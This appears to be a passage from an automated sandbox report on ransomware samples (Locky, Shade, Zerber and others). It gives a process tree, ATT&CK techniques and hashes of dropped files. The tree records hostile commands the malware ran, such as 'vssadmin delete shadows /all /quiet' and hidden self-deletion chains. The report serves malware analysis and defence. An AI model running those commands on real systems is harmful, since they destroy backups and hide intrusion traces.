C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exeTrojan-Ransom.Win32.Gimemo.cdqu-92c167bd5ce56b5e2798056e3f3129b43f019ba3370ac5a88894126b94cae16d.exe4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:1080
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exeTrojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe4⤵
- Executes dropped EXE
PID:1764 -
C:\Users\Admin\AppData\Roaming\FuzzyDfs\StudioC:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio /go5⤵
- Executes dropped EXE
PID:5068 -
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio" & del "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio" & rd "C:\Users\Admin\AppData\Roaming\FuzzyDfs\"6⤵PID:3200
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y7⤵PID:9016
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\AppData\Roaming\FuzzyDfs\Studio"7⤵
- Views/modifies file attributes
PID:3028
-
-
-
-
C:\Windows\SYSTEM32\cmd.execmd /c waitfor /t 10 pause /d y & attrib -h "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe" & del "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe" & rd "C:\Users\Admin\Desktop\00424\"5⤵PID:2384
-
C:\Windows\system32\waitfor.exewaitfor /t 10 pause /d y6⤵PID:8372
-
-
C:\Windows\system32\attrib.exeattrib -h "C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Hades.c-08a62815eabccc8dbc7babe0dfabcae9cb37a20f66373ca0bb7254c7e6c6f1bb.exe"6⤵
- Views/modifies file attributes
PID:8484
-
-
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exeTrojan-Ransom.Win32.Locky.adiq-a11caa15d682952f356c75249b803496c532ec358094b97e7daee6a17a4210e8.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
PID:372
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exeTrojan-Ransom.Win32.PornoBlocker.ejtx-724dc1a3bd703a339b5b71136baad19a35f97d1b7c6e94d7fefd4f324dcb5bf3.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2128
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exeTrojan-Ransom.Win32.Shade.psr-4d2b8abe7b2d79eb3cd44171a73a645d2d2370d64e51734208b7ef261b8e21ce.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Users\Admin\Desktop\00424\Trojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exeTrojan-Ransom.Win32.Shade.pvw-04c4e2ad0699cc27f79c0b4f62a12ce8514aea55e5737628de293d81846cf7c5.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5544
-
-
C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exeUDS-Trojan-Ransom.Win32.Generic-391cfcd153881743556f76de7bbca5b19857f8b69a6f6f6dfde6fd9b06c17f5e.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:6104 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet5⤵PID:6952
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:2224
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe delete shadows /all /quiet5⤵PID:2288
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet6⤵
- Interacts with shadow copies
PID:6216
-
-
-
-
C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exeUDS-Trojan-Ransom.Win32.PornoAsset.gen-bd78f4c233a67d83272ea92de4c5afff1a73dfea2abbb4489e54f0f5cfb6d9ac.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:8248
-
-
C:\Users\Admin\Desktop\00424\UDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exeUDS-Trojan-Ransom.Win32.Zerber.gen-c44b300c0e95a6782b39bda041a3ddf1a03190e99c9785384657f3dd332e42eb.exe4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:6232 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 11845⤵
- Program crash
PID:6188
-
-
-
C:\Users\Admin\Desktop\00424\VHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exeVHO-Trojan-Ransom.Win32.Blocker.gen-296a2e629991f1fa388bda5e674dd6471e8f84787137fb17a7567d143ea24376.exe4⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:5656
-
-
C:\Users\Admin\Desktop\00424\VHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exeVHO-Trojan-Ransom.Win32.Convagent.gen-ceb44492510d44d5bc712a41e1f4da9f5e222647b7a0f9a55db5c8cfcf024f59.exe4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:6764
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService1⤵PID:4548
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s TapiSrv1⤵PID:5224
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:5728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1136 -ip 11361⤵PID:6016
-
C:\Windows\explorer.exeexplorer.exe1⤵PID:5508
-
C:\Windows\SysWOW64\werfault.exewerfault.exe /h /shared Global\0325edc963f2448cbc163425adc7667f /t 3272 /p 10801⤵PID:6388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 5536 -ip 55361⤵PID:6680
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6620
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\f9231c2229c54e7db7ffa5456c196bb3 /t 1572 /p 21841⤵PID:556
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:6848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 800 -p 6232 -ip 62321⤵PID:4104
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:8212
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:7780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 5276 -ip 52761⤵PID:5272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5148 -ip 51481⤵PID:5432
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5644
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:5832
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 796 -p 5276 -ip 52761⤵PID:6536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 760 -p 5148 -ip 51481⤵PID:6564
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Checks processor information in registry
PID:6804
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
PID:8384
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:7840
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:1968
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:8508
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7760
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8340
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6104
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3440
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5880
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3136
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9656
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9800
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6588
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2964
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9588
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9824
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6364
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5612
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7160
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6512
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6896
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8636
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3500
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6412
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6944
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8364
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9940
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6960
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9668
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1732
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4984
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5076
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7452
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3236
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7144
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5516
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7056
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2728
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10084
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8484
-
C:\Windows\TEMP\hrl8BC3.tmpC:\Windows\TEMP\hrl8BC3.tmp2⤵PID:10124
-
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1464
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6876
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4504
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8436
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6084
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2456
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10204
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10028
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9912
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5836
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8008
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2956
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1792
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5860
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9024
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7468
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7284
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8908
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6704
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6328
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:2948
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6100
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9872
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:292
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6164
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4492
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4692
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8904
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5932
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6516
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5668
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8552
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7048
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5868
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10144
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8464
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:4352
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9916
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9820
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6888
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7820
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8776
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5892
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6700
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5940
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8836
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:10076
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6424
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7344
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5228
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:1328
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:8852
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6436
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6212
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7556
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7420
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:9392
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7260
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6584
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:6304
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7228
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7004
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7348
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:3948
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5524
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:7320
-
C:\Windows\ditziw.exeC:\Windows\ditziw.exe1⤵PID:5468
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
2PowerShell
1Scheduled Task/Job
1Scheduled Task
1Windows Management Instrumentation
1Persistence
Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Account Manipulation
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Change Default File Association
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1Hide Artifacts
1Hidden Files and Directories
1Impair Defenses
3Disable or Modify System Firewall
2Disable or Modify Tools
1Indicator Removal
2File Deletion
2Modify Registry
8Virtualization/Sandbox Evasion
2Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
2Credentials In Files
2Discovery
Browser Information Discovery
1Network Service Discovery
1Peripheral Device Discovery
2Permission Groups Discovery
1Local Groups
1Query Registry
9Remote System Discovery
1System Information Discovery
8System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5192dce4f5d1c2c27b256fc4224bb6414
SHA14af78801f8968426c6a62c68ad576229dced01c3
SHA25628646eb5acc3da4adffec688931928168681ee1b5ffcef9f043ba8033013bd56
SHA5124217a8c3ffe9266188f80b8857734bd809668bab97efdbfa1781c2908dde3b6b5d2f940c1ffd00aec862281b9a32db82204b19e9e7e1b234474d3deb66b4b1c8
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe.id-B93043C2.[[email protected]].pdf
Filesize2.9MB
MD50d8eb77809c9ed9e82556fa567e19ba7
SHA1d962bd20087c513adb1919c9cec888cce6a6c6da
SHA25685df5f8be668c260459f55a17867761dd046ee14e4bf5763730f9e2f4f5ef259
SHA512472c262de4f0f5de3a3d8ec102fd335b7aca94a81283e85edfbfd31300a25117a5b49a9198b93d103c6d6621951e3f5c19b05a257d53e16e4cb30eea847a1c6d
-
Filesize
63KB
MD52655d9cea6535bb5f952265acc169ed7
SHA121d50e7e0a1f76e2c4ce955fed35c02a4f944af2
SHA256e070ec6d8ebff49e888929d944dd04ff6ab0a5c173940b434515934b82616517
SHA5120d166f20ddbc567e68ab946e816637c5b02ab26d854647e82e97d54da20a141f6ca80dc02664e8a2db8ce98c9a47cabbca97a9a5f8010037a13296bbc49a6718
-
Filesize
1KB
MD50ef6ccc12156cee46da5e1de1059fb4d
SHA16a4ba1852c9d8217e7998844752eb2e18191ae10
SHA256a10dd530138cf1fa26bcf4975fb557e482a22a486a411ccff68cb0587cdf0c21
SHA51254dbb9f0e0532dce873ab558640c0a3518956921e2ea9d90d36e408e55aeb7d6172183f8c9aba44fa0165df14f512555bdffe4371c2ea5cb574cbd41a0770ca6
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
C:\Users\Admin\AppData\Local\Temp\3582-490\HEUR-Trojan-Ransom.MSIL.njLime.gen-17fdc8576a2bfc5aaca1ca1094c3e3f46a304074d7d1bfe68776a33b460e9e57.exe
Filesize614KB
MD5d148245917bce95215b7479440def347
SHA130544132ef1f5a3c9de93e1d2a3fefd375684749
SHA256d1ad9735ebf52eba21820f024bac78039afd23528083ade21ed529d0a7a618c0
SHA512a34ef90d56e9319237532a91be52a045e1f1994f7f31da8f63ae7872c2e04b7e7f269399b95f71ed1b1a3853901af72718bf3111eb7d22ccb7348a3aecd0a70c
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4.8MB
MD584875b39fba2e001fbbac52226cafe32
SHA1b337f3c04735b96c568f843bc2051bc18dffd249
SHA2565125bcb79b2491ca53dc3c6835942425b70136a6583872755de32cc3ff271207
SHA5121f6bd6663260e29623dc76fd55c0d6c7f3e6838e47092227d25007b9234c15020cd69f71dde0e6f8c45ce6305d90ab4175c28942aa86f22542ca70edad22b094
-
Filesize
4.5MB
MD52f7dcf07d3945bd8301371393ca33bc7
SHA1044bd355e14e78bd5029412dbdd7b1c2a6a8a836
SHA256c2e5d93f2faf0b797f6b400f4fb0db64ecd36fe5f553f3e343194eacd93f7465
SHA512c12263495f619454e4843c4ca369483e14cf0e2b6e94b9c7db3b1e020b9959b49957769db49f857bc6a6fc7cf48fc3f488966781e75b36810e27bd427e1bc49e
-
Filesize
60KB
MD5ab41b1e2db77cebd9e2779110ee3915d
SHA14122cf816aaa01e63cfb76cd151f2851bc055481
SHA2567379c5f5989be9b790d071481ee4fdfaeeb0dc7c4566cad8363cb016acc8145e
SHA512ec7105b30ccba23c891f3fa38ca77fb37785fdd8ac07750f83d9a09189ed29e7a91481119a6ace073cc1597e014bca67f295818864055408ab57cacfd7c4fc6b
-
Filesize
220KB
MD54287117d9a6a955c6a972dea69487419
SHA16dbda9462b0a722ff21f96a39ee9665dcc0b1176
SHA256c7e248b6e854ba56d3695eaae094f6354fdefbd3fb71e897521d5da47a221277
SHA512db6ce040862d6d5cb5a64f7077bbcdeb21140b4e05f034e1697fa63529358e9a0b37e72ef14e5deaade626c9df970dad7d1d366b4da4e2acdd8ed57cda2a9aa9
-
Filesize
428KB
MD5b882b9c872e50e04bda8fb7a18c28092
SHA142f6a3152e9a369f34634ece303c89fbe6dbe763
SHA256302fecaf77de168224abccd8a610dda5699e0d16ea5fa4577de83fad2f22433a
SHA512c26e0c3e44517491d0dde81587c9a371b20b8c958d70c80880dfa38efdaa502163b28ea60d7c935086b546a9cb3c0ae921ff884e4ad2a94b54310a304ed607e8
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Blocker.gen-388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52.exe
Filesize9.5MB
MD5b779cb1a5f7ee844e2c2f46dd3e161af
SHA1aa4ab809ee20374cc2e14feeb76b7cfe137e924f
SHA256388a6625b398cbfbd4d915b8165b37ebba259fe9ef89a6bbef5ca9677b42ed52
SHA5122de5499545afefe46a5c280985ceda2414aa7673fa42949b077d5ed042f4c18daffd1b5305802734ee3d14b2de9c7220e69df52eafe0310912c4bb276575de5b
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Gen.gen-886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0.exe
Filesize11.7MB
MD5725693f393f2447c736dfb735b9ffbb1
SHA1e2f8ee4969016a9f8fc04c6f21b446870306e444
SHA256886ed9d1806668c086ece3c4d433b9daced419d2fc8645d3c5db28a7b7878cd0
SHA51283f3f626f4c5cbea804f030ee9e38ef04e71cb48977e7326a4e5ec8e18e20886238e491ead8f99035f792347baa65613c2fb9d01e9c7d44e40b886799b3706e7
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Makop.gen-0ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1.exe
Filesize467KB
MD51872d50febed32fe549f3c1257ede6bc
SHA18f5d4c4c47e3d0e1071a974d92f8bba0d9ae4b6a
SHA2560ed05e4be5376f0cf391a78afc7a3114ffbfa064348fb66cd93e8ee6f6b27fe1
SHA512bdcfc894b05b73af687315aa7f2ed9643462a07cbc9a7aa95d635e00fae620c5247f6863d63af4b084fd5b488a88a4eb63bf3971744b3e6319622596899e5bdb
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Petr.gen-164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9.exe
Filesize115KB
MD5a80fb7e91ed01c5ddb00729116aed211
SHA1fd0dfb8bbef94aceca1eae3ee36512fa3364f90f
SHA256164a86e099913008bebcd659331c1033c4afd97af2a15cca3a35765bca504be9
SHA51260730bb243cf103bb1025f53b1578e07b0588e98306544cbf6c3092136054878c93ea1b1463954e538c9832630434e7dbc254810e825cedea4b3a18b4e9d552e
-
C:\Users\Admin\Desktop\00424\HEUR-Trojan-Ransom.MSIL.Thanos.gen-68cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a.exe
Filesize391KB
MD5adad0a5737a2b2bca918b78da7ef8ba2
SHA1fef9d4ca2a0562f6dd40d262de38cc2bb71d39d0
SHA25668cfd9eeb25aebc7a65c5c72b8426edc88865ec13732374ba5dda877107bfe6a
SHA512364dc6140df57cffbba3d1c8005997d9ea7e8bb6e0f244de8f01b5617e789d81c7b8fb3d129e7d2b676eefce5878cb796d5c5b48ee14a631b67045cf8e428811
-
